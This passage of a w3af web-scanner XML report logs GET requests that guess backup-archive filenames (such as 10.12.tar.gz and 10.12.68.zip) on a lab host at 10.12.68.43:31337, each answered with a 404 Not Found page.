                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="229">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="233">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="239">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
